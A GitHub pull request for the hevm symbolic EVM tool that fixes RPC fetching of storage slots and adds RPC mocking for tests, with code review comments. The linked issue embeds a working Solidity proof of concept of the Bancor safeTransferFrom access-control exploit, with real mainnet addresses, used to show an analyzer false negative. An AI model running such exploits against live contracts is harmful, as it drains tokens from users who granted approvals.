### PR TITLE
Fixing RPC fetching and reading of slots, adding mocking to RPC for testing

### LINKED ISSUE #757: Bug in RPC analyzing interesting contract: false negative generated
I assume this is a bug. Notice that I manually compiled fixed verision of Behaviour difference between revert() and revert("message") #751 from source  code and use that hevm version to run.

```
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;

import "forge-std/Test.sol";
// import "./../interface.sol";

/*
Bancor Protocol Access Control Exploit PoC

Some of the newly deployed Bancor contracts had the 'safeTransferFrom' function public.

As a result, if any user had granted approval to these contracts was vulnerable.

The attacker can check if an user had granted an allowance to Bancor Contracts to transfer the ERC20 token 

Example tx - https://etherscan.io/tx/0x4643b63dcbfc385b8ab8c86cbc46da18c2e43d277de3e5bc3b4516d3c0fdeb9f
*/

interface IERC20 {
    event Approval(address indexed owner, address indexed spender, uint256 value);
    event Transfer(address indexed from, address indexed to, uint256 value);

    function name() external view returns (string memory);
    function symbol() external view returns (string memory);
    function decimals() external view returns (uint8);
    function totalSupply() external view returns (uint256);
    function balanceOf(address owner) external view returns (uint256);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 value) external returns (bool);
    function transfer(address to, uint256 value) external returns (bool);
    function transferFrom(address from, address to, uint256 value) external returns (bool);
}

interface IBancor {
    function safeTransferFrom(IERC20 _token, address _from, address _to, uint256 _value) external;
}

contract BancorExploit is Test {
    address bancorAddress = 0x5f58058C0eC971492166763c8C22632B583F667f;
    address victim = 0xfd0B4DAa7bA535741E6B5Ba28Cba24F9a816E67E;
    address attacker = address(this);
    IERC20 XBPToken = IERC20(0x28dee01D53FED0Edf5f6E310BF8Ef9311513Ae40);

    IBancor bancorContract = IBancor(bancorAddress);

    function setUp() public {
        // vm.createSelectFork("mainnet", 10_307_563); // fork mainnet at 10307563
    }


    function test_attack_symbolic(uint256 _symbolicAmount) public {
        XBPToken.balanceOf(victim);
        uint256 balBefore = XBPToken.balanceOf(attacker);

        vm.prank(address(this));
        bancorContract.safeTransferFrom(
            IERC20(address(XBPToken)),
            victim,
            attacker,
            _symbolicAmount // Use symbolic parameter
        );
        
        uint256 balAfter = XBPToken.balanceOf(attacker);
        uint256 profit = balAfter - balBefore;
        
        uint256 TARGET_PROFIT = 905987977635678910008152;
        
        assert(!(profit >= TARGET_PROFIT));
    }
}
```

`forge build --ast && hevm test --prefix test_attack_symbolic --rpc https://eth-mainnet.g.alchemy.com/v2/MY_MAINNET_KEY --number 10307563 --max-iterations 10000000 --max-width 1000000 --debug`

The result is 

```
Found 1 unit test contract(s) to test:
  --> src/contract.sol:BancorExploit  ---  functions: [Sig "test_attack_symbolic" [uint256]]

Checking 1 function(s) in contract src/contract.sol:BancorExploit
[RUNNING] test_attack_symbolic(uint256)
   Exploring call prefix 0xa99c2b0c
Fetching contract at 0x28dee01D53FED0Edf5f6E310BF8Ef9311513Ae40
Fetching slot 0xab39bd4ed4f120ab16b799b542a9f20cadc701e31bfb4bc86052bf201b781ebc at 0x28dee01D53FED0Edf5f6E310BF8Ef9311513Ae40
Fetching slot 0xdc4a7ad13353c10d0e254bc1f761fe9108c0bea9c606b34d2e17ef495a437d87 at 0x28dee01D53FED0Edf5f6E310BF8Ef9311513Ae40
Fetching contract at 0x5f58058C0eC971492166763c8C22632B583F667f
Fetching slot 0x66b84109c8f5a9fd113b760731fbc2d1001ab239ccfefcac3aefa3c56db93eaf at 0x28dee01D53FED0Edf5f6E310BF8Ef9311513Ae40
   Simplifying expression
   Exploration finished, 5 branch(es) to check in call prefix 0xa99c2b0c
   Checking for reachability of 1 potential property violation(s) in call prefix 0xa99c2b0c
   SMT result: Cex SMTCex {vars = fromList [(Var "arg1",0xbfd9b4e8f99ec359cb58)], addrs = fromList [], buffers = fromList [(AbstractBuf "txdata",Comp Base {byte = 0, length = 0x5})], store = fromList [], blockContext = fromList [], txContext = fromList []}
   Found 1 potential counterexample(s) in call prefix 0xa99c2b0c
   -> debug of func: test_attack_symbolic Failure at the end of expr: Revert (ConcreteBuf "NH{q\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\SOH")
   -> debug of func: test_attack_symbolic Failure at the end of expr: Revert (ConcreteBuf "")
   -> debug of func: test_attack_symbolic Failure at the end of expr: Revert (ConcreteBuf "")
   -> debug of func: test_attack_symbolic Failure at the end of expr: Revert (ConcreteBuf "")
symRun -- (cex,warnings,unexpectedAllRevert): (True,False,False)
   [FAIL] test_attack_symbolic
   Counterexample:
     calldata: test_attack_symbolic(905987977635678910008152)
     result:   Revert: 0x4e487b710000000000000000000000000000000000000000000000000000000000000001

unitTest individual results: [(False,True)]
```
And it's correct.

However, if you comment line 52 to`         // XBPToken.balanceOf(victim);`
It is expected that the result should not change. However, in reality the result will become:

```
Found 1 unit test contract(s) to test:
  --> src/contract.sol:BancorExploit  ---  functions: [Sig "test_attack_symbolic" [uint256]]

Checking 1 function(s) in contract src/contract.sol:BancorExploit
[RUNNING] test_attack_symbolic(uint256)
   Exploring call prefix 0xa99c2b0c
Fetching contract at 0x28dee01D53FED0Edf5f6E310BF8Ef9311513Ae40
Fetching slot 0xdc4a7ad13353c10d0e254bc1f761fe9108c0bea9c606b34d2e17ef495a437d87 at 0x28dee01D53FED0Edf5f6E310BF8Ef9311513Ae40
Fetching contract at 0x5f58058C0eC971492166763c8C22632B583F667f
Fetching slot 0x66b84109c8f5a9fd113b760731fbc2d1001ab239ccfefcac3aefa3c56db93eaf at 0x28dee01D53FED0Edf5f6E310BF8Ef9311513Ae40
   Simplifying expression
   Exploration finished, 5 branch(es) to check in call prefix 0xa99c2b0c
   Checking for reachability of 0 potential property violation(s) in call prefix 0xa99c2b0c
   Found 0 potential counterexample(s) in call prefix 0xa99c2b0c
   -> debug of func: test_attack_symbolic Failure at the end of expr: Revert (ConcreteBuf "NH{q\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\SOH")
   -> debug of func: test_attack_symbolic Failure at the end of expr: Revert (ConcreteBuf "")
   -> debug of func: test_attack_symbolic Failure at the end of expr: Revert (ConcreteBuf "")
   -> debug of func: test_attack_symbolic Failure at the end of expr: Revert (ConcreteBuf "")
symRun -- (cex,warnings,unexpectedAllRevert): (False,False,False)
   [PASS] test_attack_symbolic

unitTest individual results: [(True,True)]
```
which should not happen.

### PR DESCRIPTION
**Pull request by msooseth**
## Description
There was a bug with RPC not fetching data. The fix for this was that in case the contract is remote, check the underlying concrete storage directly to see if the value has already been fetched. If not, then fetch it. It's a relatively simple, straightforward code change.

The more complex part of this PR is that I added a test framework for creating and using mock data for RPC, so we can create and replay RPC call data for proper testing. When in `--debug` mode, all RPC data is written to JSON files. These can then be collated together with a python script. I used python because it's only to be used by developers, so it doesn't need to be present and exposed in nix, etc.

Fixes #757 

## Checklist

- [x] tested locally
- [x] added automated tests
- [ ] updated the docs
- [x] updated the changelog

### CODE REVIEW

**Comment by gustavo-grieco** [comment]
Is this affecting concrete execution as well?

**Comment by msooseth** [comment]
> Is this affecting concrete execution as well?

It should not be, AFAIK. Also, I still need to refine this, some tests are failing.

File: src/EVM.hs [hunk 1]
```diff
@@ -1433,12 +1431,12 @@ accessStorage addr slot continue = do
       --     However, without concretization, it may not find things that are actually in the storage
       case readStorage slot c.storage of
         Just x -> case readStorage slotConc c.storage of
-          Just _ -> continue x
-          Nothing -> rpcCall c slotConc
+          Just (Lit _) -> continue x
+          Just _ | not c.external -> continue x
+          _ -> rpcCall c slotConc
```
Comment (msooseth) [inline src/EVM.hs:1436]: Basically, the issue here was, that the `readStorage` would return a `Just (SLoad...)` in some cases, which is wrong -- it actually didn't find the concrete storage, and the data may not have been retrieved from RPC.

File: cli/cli.hs [hunk 2]
```diff
@@ -585,11 +588,13 @@ launchExec cFileOpts execOpts cExecOpts cOpts = do
         internalError "no EVM result"
 
 -- | Creates a (concrete) VM from command line options
-vmFromCommand :: CommonOptions -> CommonExecOptions -> CommonFileOptions -> ExecOptions -> IO (VM Concrete RealWorld)
+vmFromCommand :: App m => CommonOptions -> CommonExecOptions -> CommonFileOptions -> ExecOptions -> m (VM Concrete RealWorld)
 vmFromCommand cOpts cExecOpts cFileOpts execOpts= do
+  conf <- readConfig
+  liftIO $ putStrLn $ "vmfromcommand calldata: " <> show calldata
```
Comment (blishko) [inline cli/cli.hs]: Is this leftover debug stuff?

File: cli/cli.hs [hunk 3]
```diff
@@ -697,11 +702,15 @@ vmFromCommand cOpts cExecOpts cFileOpts execOpts= do
         addr f def = maybe def LitAddr (f cExecOpts)
         bytes f def = maybe def decipher (f cOpts)
 
-symvmFromCommand :: CommonExecOptions -> SymbolicOptions -> CommonFileOptions -> (Expr Buf, [Prop]) -> IO (VM EVM.Types.Symbolic RealWorld)
+symvmFromCommand :: App m =>
+  CommonExecOptions -> SymbolicOptions -> CommonFileOptions ->
+  (Expr Buf, [Prop]) -> m (VM EVM.Types.Symbolic RealWorld)
 symvmFromCommand cExecOpts sOpts cFileOpts calldata = do
+  liftIO $ putStrLn $ "symvmfromcommand calldata: " <> show calldata
```
Comment (blishko) [inline cli/cli.hs]: Debug message?

File: hevm.cabal [hunk 4]
```diff
@@ -186,6 +186,7 @@ library
     split                             >= 0.2.3 && < 0.3,
     template-haskell                  >= 2.19.0 && < 3,
     extra                             >= 1.7.14 && < 2,
+    aeson-pretty,
```
Comment (blishko) [inline hevm.cabal]: I guess we should add the version bounds?

File: src/EVM.hs [hunk 5]
```diff
@@ -1433,31 +1431,36 @@ accessStorage addr slot continue = do
...
         if c.external
         then forceConcreteAddr addr "cannot read storage from symbolic addresses via rpc" $ \addr' ->
           forceConcrete slotConc "cannot read symbolic slots via RPC" $ \slot' -> do
-            -- check if the slot is cached
             use (#env % #contracts % at (LitAddr addr')) >>= \case
               Nothing -> internalError $ "contract addr " <> show addr' <> " marked external not found in cache"
-              Just fetched -> case readStorage (Lit slot') fetched.storage of
-                          Nothing -> mkQuery addr' slot'
-                          Just val -> continue val
+              -- At this point, we know the contract is external and in the underlying storage
```
Comment (blishko) [inline src/EVM.hs]:
```suggestion
              -- At this point, we know the contract is external and the underlying storage
```

File: cli/cli.hs (hunk 2 above)
Comment (msooseth) [reply cli/cli.hs]: Oh yes.... Thanks, let me fix this, and read through again!

File: hevm.cabal (hunk 4 above)
Comment (msooseth) [reply hevm.cabal]: Oh yes, sorry, added now.

File: cli/cli.hs (hunk 3 above)
Comment (msooseth) [reply cli/cli.hs]: Yess. Fixed :)

**Comment by msooseth** [comment]
OK, I tried to go through one more time, and I cleaned up this PR. Should be a little easier on the eyes now :)
